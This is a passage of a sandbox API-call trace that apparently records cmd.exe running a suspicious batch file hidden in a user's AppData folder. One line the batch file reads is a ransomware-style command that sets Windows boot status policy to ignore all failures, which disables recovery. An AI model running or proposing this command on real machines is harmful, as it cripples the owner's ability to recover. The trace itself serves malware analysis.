(_String1="bcdedit", _String2="SETLOCAL") returned -17 [0036.686] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0036.686] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0036.686] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0036.686] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0036.686] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0036.686] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0036.686] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0036.686] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0036.686] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0036.686] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0036.686] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0036.686] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0036.686] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0036.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.686] SetErrorMode (uMode=0x0) returned 0x1 [0036.686] GetProcessHeap () returned 0x3e0000 [0036.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x64) returned 0x3f6cf0 [0036.686] GetProcessHeap () returned 0x3e0000 [0036.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x64 [0036.686] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.686] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.686] GetProcessHeap () returned 0x3e0000 [0036.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.686] GetProcessHeap () returned 0x3e0000 [0036.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.686] GetProcessHeap () returned 0x3e0000 [0036.687] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.687] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.687] GetProcessHeap () returned 0x3e0000 [0036.687] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0036.687] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0036.687] GetProcessHeap () returned 0x3e0000 [0036.687] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0036.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.687] GetLastError () returned 0x2 [0036.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.687] GetLastError () returned 0x2 [0036.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.687] GetLastError () returned 0x2 [0036.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.688] GetLastError () returned 0x2 [0036.688] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.688] GetLastError () returned 0x2 [0036.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.688] GetLastError () returned 0x2 [0036.688] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.689] GetLastError () returned 0x2 [0036.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.690] GetLastError () returned 0x2 [0036.690] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.690] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.691] GetLastError () returned 0x2 [0036.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.693] GetLastError () returned 0x2 [0036.693] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.693] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb8 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x5e) returned 0x3f8278 [0036.693] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71d0 [0036.693] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d8, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.693] SetErrorMode (uMode=0x0) returned 0x1 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71d0, Size=0x64) returned 0x3f71d0 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71d0) returned 0x64 [0036.693] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.693] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7240 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7368 [0036.693] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7368, Size=0x122) returned 0x3f7368 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7368) returned 0x122 [0036.693] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.693] GetProcessHeap () returned 0x3e0000 [0036.693] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7498 [0036.694] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7498, Size=0x76) returned 0x3f7498 [0036.694] GetProcessHeap () returned 0x3e0000 [0036.694] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7498) returned 0x76 [0036.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.694] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.694] GetLastError () returned 0x2 [0036.694] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.694] GetLastError () returned 0x2 [0036.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.694] GetLastError () returned 0x2 [0036.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.695] GetLastError () returned 0x2 [0036.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.695] GetLastError () returned 0x2 [0036.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.695] GetLastError () returned 0x2 [0036.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.697] GetLastError () returned 0x2 [0036.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.698] GetLastError () returned 0x2 [0036.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.699] GetLastError () returned 0x2 [0036.699] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.701] GetLastError () returned 0x2 [0036.703] _get_osfhandle (_FileHandle=2) returned 0x26c [0036.703] GetFileType (hFile=0x26c) returned 0x3 [0036.703] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a994640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0036.704] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a994640, nSize=0x2000, Arguments=0x3beb80 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0036.704] _get_osfhandle (_FileHandle=2) returned 0x26c [0036.704] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n", cchWideChar=-1, lpMultiByteStr=0x4a986640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n", lpUsedDefaultChar=0x0) returned 99 [0036.704] WriteFile (in: hFile=0x26c, lpBuffer=0x4a986640*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x3beb58, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesWritten=0x3beb58*=0x62, lpOverlapped=0x0) returned 1 [0036.704] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.704] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.704] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.705] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.705] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.705] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.705] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.705] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.705] SetConsoleInputExeNameW () returned 0x1 [0036.705] GetConsoleOutputCP () returned 0x1b5 [0036.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0036.706] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0036.706] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.706] SetFilePointer (in: hFile=0x78, lDistanceToMove=810, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x32a [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7498 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7368 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7240 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71d0 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0036.706] GetProcessHeap () returned 0x3e0000 [0036.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0036.706] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.706] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x32a [0036.707] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1597, lpOverlapped=0x0) returned 1 [0036.707] SetFilePointer (in: hFile=0x78, lDistanceToMove=869, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x365 [0036.707] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=59, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="bcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nnded\r\n") returned 59 [0036.707] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.707] GetFileType (hFile=0x78) returned 0x1 [0036.707] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.707] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x365 [0036.707] GetProcessHeap () returned 0x3e0000 [0036.707] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.707] GetProcessHeap () returned 0x3e0000 [0036.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.707] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0036.707] GetProcessHeap () returned 0x3e0000 [0036.707] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0036.707] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x6e) returned 0x3f3ff0 [0036.707] _tell (_FileHandle=3) returned 869 [0036.707] _close (_FileHandle=3) returned 0 [0036.708] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0036.708] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0036.708] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0036.708] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0036.708] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0036.708] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0036.708] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0036.708] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0036.708] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0036.708] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0036.708] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0036.708] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0036.708] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0036.708] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0036.708] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0036.708] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0036.708] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0036.708] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0036.708] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0036.708] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0036.708] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0036.708] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0036.708] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0036.708] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0036.708] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0036.708] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0036.708] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0036.708] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0036.708] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0036.708] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0036.708] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0036.708] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0036.708] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0036.708] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0036.708] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0036.708] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0036.708] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0036.708] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0036.709] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0036.709] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0036.709] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0036.709] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0036.709] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.709] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.709] SetErrorMode (uMode=0x0) returned 0x1 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x64) returned 0x3f6cf0 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x64 [0036.709] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.709] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.709] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.709] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0036.709] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0036.709] GetProcessHeap () returned 0x3e0000 [0036.709] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0036.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.710] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.710] GetLastError () returned 0x2 [0036.710] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.710] GetLastError () returned 0x2 [0036.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.710] GetLastError () returned 0x2 [0036.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.710] GetLastError () returned 0x2 [0036.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.710] GetLastError () returned 0x2 [0036.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.711] GetLastError () returned 0x2 [0036.711] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.711] 